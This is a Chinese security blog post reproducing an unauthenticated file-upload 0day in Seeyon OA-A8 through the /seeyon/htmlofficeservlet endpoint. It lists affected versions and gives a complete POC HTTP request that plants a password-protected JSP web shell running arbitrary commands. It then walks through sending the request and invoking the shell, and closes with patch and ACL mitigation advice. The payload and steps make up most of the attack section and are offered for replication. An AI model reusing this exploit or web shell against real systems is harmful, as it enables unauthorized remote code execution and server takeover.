Eugene's Blog

致远OA系统0day复现步骤(附POC)

昨天爆出一个致远OA的0day也附带了POC,也是一堆小伙伴在补天,eudsrc等平台疯狂刷啊。
这个洞可以直接Getshell,危害也不小

一、漏洞情况分析

致远OA-A8是由北京致远互联软件股份有限公司(以下简称致远公司)开发的一款协同管理软件,构建了面向中大型、集团组织的数字化协同运营平台。致远OA-A8系统基于组织管理的基础理论设计,支持大型组织的发展和变化,解决了组织结构、业务重组、组织流程再造等结构治理相对应的问题,满足集团战略管控、营运管控和财务管控的战略协同行为和垂直业务管控的要求。

该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码。

二、漏洞影响范围

漏洞影响的产品版本包括:

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1


POC:
POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce


复现步骤:
打开一个目标站点,抓包并且替换成POC

发送数据包后,网页回显这个数据

在访问  /seeyon/test123456.jsp?pwd=asasd3344&cmd=ipconfig

已经成功执行命令了。

三、漏洞处置建议

目前,致远公司已发布补丁完成修复,并成立专项小组,对涉及以上版本的用户进行排查。补丁和更新信息获取方式如下:

1、登录致远互联服务网站(http://support.seeyon.com)获取补丁;

2、关注“致远互联微服务”公众号,及时获取安全更新通知;

3、如有技术问题可联系致远公司,Email:security@seeyon.com,电话:400-700-8822。

临时修补方案如下:

1、 配置URL访问控制策略;

2、 在公网部署的致远A8+服务器,通过ACL禁止外网对“/seeyon/htmlofficeservlet”路径的访问;

3、 对OA服务器上的网站后门文件进行及时查杀。

建议使用致远OA-A8系统的信息系统运营者进行自查,发现存在漏洞后,按照以上方案及时修复。

另,致远OA在部分企事业单位的内网办公系统应用也较为广泛,建议及时进行自查和修复。



版权声明:《 致远OA系统0day复现步骤(附POC) 》为Eugene原创文章未经允许不得转载。

 Eugene
 作者签名:专注于网络安全的小白(手动滑稽)

发表评论:

用心评论~

TOP
Copyright © 2019 Eugene's Blog 版权所有
粤ICP备18040336号
sitemap